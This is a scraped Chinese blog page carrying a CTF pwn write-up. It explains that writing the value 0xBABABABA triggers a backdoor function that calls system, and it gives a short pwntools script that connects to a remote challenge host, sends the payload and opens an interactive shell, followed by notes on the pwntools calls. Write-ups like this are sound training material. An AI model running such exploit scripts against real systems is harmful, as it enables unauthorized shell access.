当前位置:网站首页>PwnTheBox,Pwn:tutorial1
PwnTheBox,Pwn:tutorial1
2022-06-10 22:01:00 【Part 02】
分析,当 buf 存储的值为 0xBABABABA (十六进制) 时,会调用 backdoor 函数
在 backdoor 中有命令执行,可以利用 system 获取 shell
综上,payload 是 0xBABABABA
exp:
from pwn improt *
context(log_level='debug')
p = remote('redirect.do-not-trust.hacking.run',10146)
payload = 0xBABABABA
p.sendline(p64(payload))
p.recv()
p.interactive()-context(os='linux', arch='amd64', log_level='debug')
1. os设置系统为linux系统,在完成ctf题目的时候,大多数pwn题目的系统都是linux
2. arch设置架构为amd64,可以简单的认为设置为64位的模式,对应的32位模式是’i386’
3. log_level设置日志输出的等级为debug,这句话在调试的时候一般会设置,这样pwntools会将完整的io过程都打印下来,使得调试更加方便,可以避免在完成CTF题目时出现一些和IO相关的错误。-remote 模块访问远程服务器
-sendline(data) : 发送一行数据,相当于在数据末尾加\n。
-recv(numb=字节大小, timeout=default) : 接收指定字节数。
-interactive() : 在取得shell之后使用,直接进行交互,相当于回到shell的模式。
打通,获取目录
得到 flag
边栏推荐
- 线程池的创建
- Web3技术栈权威指南【2022】
- That's great. The Ministry of industry and information technology has launched an internet account with a "one click unbinding" mobile phone number, which can be called an artifact
- How to run Plink software -- three methods
- "Draw the bow as strong, use the arrow as long", Manfu technology opens a new track for the data service industry
- [raise bar C #] how to call the base of the interface
- [006] initial string
- Basic knowledge learning of Web cluster (1)
- 分布式基础
- LuoYongHao: if I were the person in charge, I could make apple products go up more than three steps
猜你喜欢
C automatically generates Oracle table creation statement according to excel
集度夏一平:不是所有事都向李彦宏汇报,靠产品跟小米华为竞争
That's great. The Ministry of industry and information technology has launched an internet account with a "one click unbinding" mobile phone number, which can be called an artifact
kubernetes多網卡方案之Multus CNI部署和基本使用
Mmdetection dataloader construction
Play electronics, poor three generations
Redis from entry to entry
分布式基础
Missing heritability
How to run Plink software -- three methods
随机推荐
数据与信息资源共享平台(七)
[content co creation] issue 17: summer is hot and you are so sweet! Participating in the signing of Huawei cloud Xiaobian, there is always a pattern gift bag that moves you!
Display of successful cases of target customer matching data table
Html+php+mysql login registration page
开中银证券账户安全吗?风险高吗?
2022g1 industrial boiler stoker test questions and online simulation test
Assembly: assembly mixed with c-faction language and corresponding lldb common instructions
项目实训10——对特定数据库的备份
Image mosaic camera mosaic notes
【GMM+KDE】基于MATLAB的GMM和KDE核估计得目标跟踪仿真
DC4 of vulnhub
IPO can't cure Weima's complications?
Opencv_ 100 questions_ Chapter III (11-15)
云数据中心中的SDN/NFV应用
SMB anonymous
Vulnhub's DC3
Openjudge noi 1.13 15: finding modes in sequences
unity 代码为动画注册事件
Redis数据结构
smb匿名